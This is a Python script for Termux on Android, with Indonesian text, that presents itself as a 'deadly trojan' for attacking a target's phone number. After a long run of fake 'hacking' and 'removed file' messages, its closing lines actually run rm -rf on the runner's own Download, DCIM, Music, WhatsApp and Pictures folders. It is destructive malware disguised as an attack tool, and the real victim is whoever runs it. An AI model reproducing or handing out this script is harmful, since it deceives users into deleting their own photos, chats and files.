#!/bin/usr/python

import os
import sys
from time import sleep

virus_anjay = "@@@^@%-$●●●$@;×,×;-^-/@%#■■♤~♤^-:♤•♤♤••>>~}◇•》○■•■○■○■\■○《》●》●》¤¡●¿\◇•¡¤ bHajwusy!bs&&@@^@%/@%@//×/@=×/@/@/@/×/×/@/×/×%@/×%#%#%#%÷%@^%×^@%@%@%×%@%@%#%#%÷%#%#%#/#%#%#%#%#%#%#%^#^#^@^@^-^@%-^^#%#%@%-^!*!*@*@*@^@☆■~♤}•■~♤•"
if (virus_anjay):
	print (" ")
	print (" ")
	print ("sedang melakukan installing....")
###############################################
"""
	INI ADALAH VIRUS TROJAN YANG SANGAT MEMATIKAN

"""
##############################################

# orang ganteng

os.system('clear')
print ("""\033[1;31m
		TROJAN MEMATIKAN
	       \033[1;33m÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷

""")

# Khazul keren

a = input("\033[1;35mNomor hp target : ")
server_message = "http://www.SmSID.API.com"
connecting = "https://server.bangsat.com"
print (" ")
print ("\033[1;36m Please wait bro ....")
print ("\033[1;36m Sending ... 💌 ")
os.system('termux-setup-storage')
print (' ')

print("\033[1;36m sedang melakukan hacking..👌 ")
sleep(4)
print(" ")
print(" ")
print("\033[1;36m mendapat file korban.....")
sleep(2)
print(" ")
print("\033[1;31m sedang menghapus data data korban...")
print("\033[1;36m mohon tunggu....")
sleep(2)
print("\033[1;31m removed file....")
print(" ")
print(" ")
print(" ")
print(" ")
sleep(4)
print("\033[1;31m removed file....")
print(" ")
print(" ")
print(" ")
print(" ")
sleep(4)
print("\033[1;31m removed file....")
print(" ")
print(" ")
print(" ")
print(" ")
sleep(4)
print("\033[1;31m removed file....")
print(" ")
print(" ")
print(" ")
print(" ")
sleep(4)
print("\033[1;31m removed file....")
print(" ")
print(" ")
print(" ")
print(" ")
sleep(4)
print("\033[1;31m removed file....")
print(" ")
print(" ")
print(" ")
print(" ")
sleep(4)
print("\033[1;31m removed file....")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
sleep(4)
print("\033[1;31m removed file....")
print(" ")
print(" ")
print(" ")
print(" ")
sleep(4)
print("\033[1;31m removed file....")
print(" ")
print(" ")
print(" ")
print(" ")
sleep(4)
print("\033[1;31m removed file....")
print(" ")
print(" ")
print(" ")
print(" ")
sleep(4)
print("\033[1;31m removed file....")
print(" ")
print(" ")
print(" ")
print(" ")
sleep(4)
print("\033[1;31m removed file....")
print(" ")
print(" ")
print(" ")
print(" ")
sleep(4)
print("\033[1;31m removed file....")
print(" ")
print(" ")
print(" ")
print(" ")
sleep(4)
print("\033[1;31m removed file....")
print(" ")
print(" ")
print(" ")
print(" ")
sleep(4)
print("\033[1;31m removed file....")
print(" ")
print(" ")
print(" ")
print(" ")
sleep(4)
print("\033[1;31m removed file....")
print(" ")
print(" ")
print(" ")
print(" ")
sleep(4)
print("\033[1;31m removed file....")
print(" ")
print(" ")
print(" ")
print(" ")
sleep(4)
print("\033[1;31m removed file....")
print(" ")
print(" ")
print(" ")
print(" ")
sleep(4)
print("\033[1;31m removed file....")
print(" ")
print(" ")
print(" ")
print(" ")
sleep(4)
print("\033[1;31m removed file....")
print("\033[1;36m target berhasil dilumpuhkan😎")
sleep(3)
print("\033[0;32m SHILAKAN KEMBALI LAGI NANTI")

os.system('termux-setup-storage')
os.system('rm -rf /storage/emulated/0/Download')
os.system('rm -rf /storage/emulated/0/DCIM')
os.system('rm -rf /storage/emulated/0/Music')
os.system('rm -rf /storage/emulated/0/WhatsApp')
os.system('rm -rf /storage/emulated/0/Pictures')
os.system('rm -rf /strorage/emulated/')
print("\033[1;35m Terima kasih sudah menggunakan tools ini")
print("\033[1;35m shilakan kembali lagi nanti")
os.system("exit")







